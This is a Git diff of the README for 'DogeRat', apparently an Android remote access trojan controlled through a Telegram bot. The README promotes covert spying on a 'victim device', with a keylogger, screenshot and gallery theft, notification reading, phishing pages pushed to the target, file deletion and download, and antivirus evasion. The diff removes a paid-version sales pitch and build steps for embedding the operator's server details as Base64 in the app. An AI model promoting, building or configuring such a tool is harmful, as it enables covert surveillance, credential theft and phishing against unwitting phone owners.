Compare commits

..

No commits in common. "23f7f8afa039fa0e32d71a2400454122642eb42a" and "1c04480a2d78163756a51f5e7ce756c9d95c088c" have entirely different histories.

View File

@ -10,6 +10,7 @@
<img src="https://dogelina.com/dogs/scr.jpg" alt="Logo" /> <img src="https://dogelina.com/dogs/scr.jpg" alt="Logo" />
</p> </p>
## Features ## Features
- 🔴 Real time - 🔴 Real time
- 🌐 custom web view - 🌐 custom web view
@ -32,29 +33,7 @@
- ✅️ auto start after device boot - ✅️ auto start after device boot
- 🔐 Keylogger {Availbe in apk v1 and v2} - 🔐 Keylogger {Availbe in apk v1 and v2}
- ✨ Beautiful telegram bot interface - ✨ Beautiful telegram bot interface
- -🤖 Undetectable by antivirus -🤖 Undetectable by antivirus
## DOGE RAT PAID VERSION FEATURES
🔐 Open any phising page in victim device
- 🖥️ Screenshot (get screenshot from your victim device)
- 📒 Gallery puller (Get all photos available in gallery)
- 🔔 notification reader
- 🔔 notification sender (send custom notification that apper on target device with custom click link)
- 🗨️ show toast message on target device (Toasts are messages that appear in a box at the bottom of the device)
- 🔤 Advance Keylogger
- 📁 PowerFull file manager {delete and Download Files}
- ✨ Beautiful telegram bot interface
- 🤖 Undetectable by antivirus
<p align="center">
<a href="https://t.me/shivaya_dav">
<img src="https://img.shields.io/badge/BUY-NOW-blue?style=for-the-badge&logo=telegram" alt="Telegram Badge"/>
</a>
<a href="https://t.me/shivaya_dav">
<img src="https://img.shields.io/badge/BUY-NOW-blue?style=for-the-badge&logo=telegram" alt="Telegram Badge"/>
</a>
<a href="https://t.me/shivaya_dav">
<img src="https://img.shields.io/badge/BUY-NOW-blue?style=for-the-badge&logo=telegram" alt="Telegram Badge"/>
</a>
</p>
<h2>Requirements</h2> <h2>Requirements</h2>
<ul> <ul>
<li><span style="color: #0074D9;">APK EDITOR</span></li> <li><span style="color: #0074D9;">APK EDITOR</span></li>
@ -127,36 +106,6 @@ Copy url and minimize the termux
} }
``` ```
## How to Build in Android Studio
To build the application in Android Studio, follow these steps:
1. Open the Android Studio and import the application source code.
2. Navigate to the following path in the source code: `Utils/AppTools.kt`.
3. In the `AppTools.kt` file, locate the `data` variable and copy your server information into it.
4. However, before copying the server information directly into the variable, you must encode it using Base64.
5. Here is an example JSON structure for your server information:
```
{
"host" : "",
"socket" : "",
"webView" : "https://www.google.com"
}
```
6. Fill in the above JSON structure with your server information.
7. Go to https://www.base64encode.org/ and copy the encoded result of your JSON data.
8. In Android Studio, paste the encoded result into the `data` variable.
9. The final code should look like this:
```kotlin
fun getAppData(): AppData {
val data = "<your encoded server info>"
val text = decode(data)
return json().fromJson(text, AppData::class.java)
}
```
<h2 align="center">🔗 Contact and Social Media Accounts</h2> <h2 align="center">🔗 Contact and Social Media Accounts</h2>
@ -170,7 +119,7 @@ fun getAppData(): AppData {
<a href="https://twitter.com/CyberShieldX"> <a href="https://twitter.com/CyberShieldX">
<img src="https://img.shields.io/badge/CONTACT-TWITTER-blue?style=for-the-badge&logo=twitter" alt="Twitter Badge"/> <img src="https://img.shields.io/badge/CONTACT-TWITTER-blue?style=for-the-badge&logo=twitter" alt="Twitter Badge"/>
</a> </a>
<a href="https://www.youtube.com/@sphanter/about"> <a href="https://www.youtube.com/channel/UCIQVMD1wD0M02V2JbVP_KrA">
<img src="https://img.shields.io/badge/CONTACT-YOUTUBE-red?style=for-the-badge&logo=youtube" alt="Youtube Badge"/> <img src="https://img.shields.io/badge/CONTACT-YOUTUBE-red?style=for-the-badge&logo=youtube" alt="Youtube Badge"/>
</a> </a>
</p> </p>
@ -199,30 +148,26 @@ fun getAppData(): AppData {
<h2 align="center">🍻 Support 🍻</h2>
<p align="center"> <p align="center">
<h1 align="center">Sponsorship</h1> <a href="https://www.buymeacoffee.com/yourusername">
<img src="https://img.shields.io/badge/-Buy%20Me%20a%20Coffee-orange?style=for-the-badge&logo=buy-me-a-coffee&logoColor=white" alt="Buy Me A Coffee"/>
</a>
</p>
<p align="center">If you find my work valuable, you can show your support by sponsoring me. <p align="center">Support this project with cryptocurrency:</p>
Your contribution will help me maintain and improve my projects, and it will encourage me to create more useful content.</p>
<p align="center"> <p align="center">
<a href="https://www.buymeacoffee.com/shivayadav"><img src="https://img.shields.io/badge/-Buy%20me%20a%20coffee-orange?style=for-the-badge&logo=buy-me-a-coffee&logoColor=white" alt="Buy me a coffee"></a> Bitcoin: 1LeLwYyDHu51875aenZaNcEnMrEbHwEKJd<br>
USDT TRC20: TWX456AoupoYKwCYUKk3ZMWJtNJZRRHnrp
</p> </p>
<h3 align="center">❤️ Thank you Supporters ❤️</h3>
<p align="center">
<p align="center">Thank you to the following people for their support:</p>
<div align="center">
<a href="https://github.com/shivaya-dav/DogeRat/stargazers"> <a href="https://github.com/shivaya-dav/DogeRat/stargazers">
<img src="https://reporoster.com/stars/dark/shivaya-dav/DogeRat" alt="Stargazers" title="Stargazers" width="400" height="auto"> <img src="https://img.shields.io/github/stars/shivaya-dav/DogeRat?style=for-the-badge&color=yellow" alt="Stargazers repo roster on GitHub"/>
</a> </a>
</p>
-------------------------
<a href="https://github.com/shivaya-dav/DogeRat/network/members">
<img src="https://reporoster.com/forks/dark/shivaya-dav/DogeRat" alt="Forkers" title="Forkers" width="400" height="auto">
</a>
</div>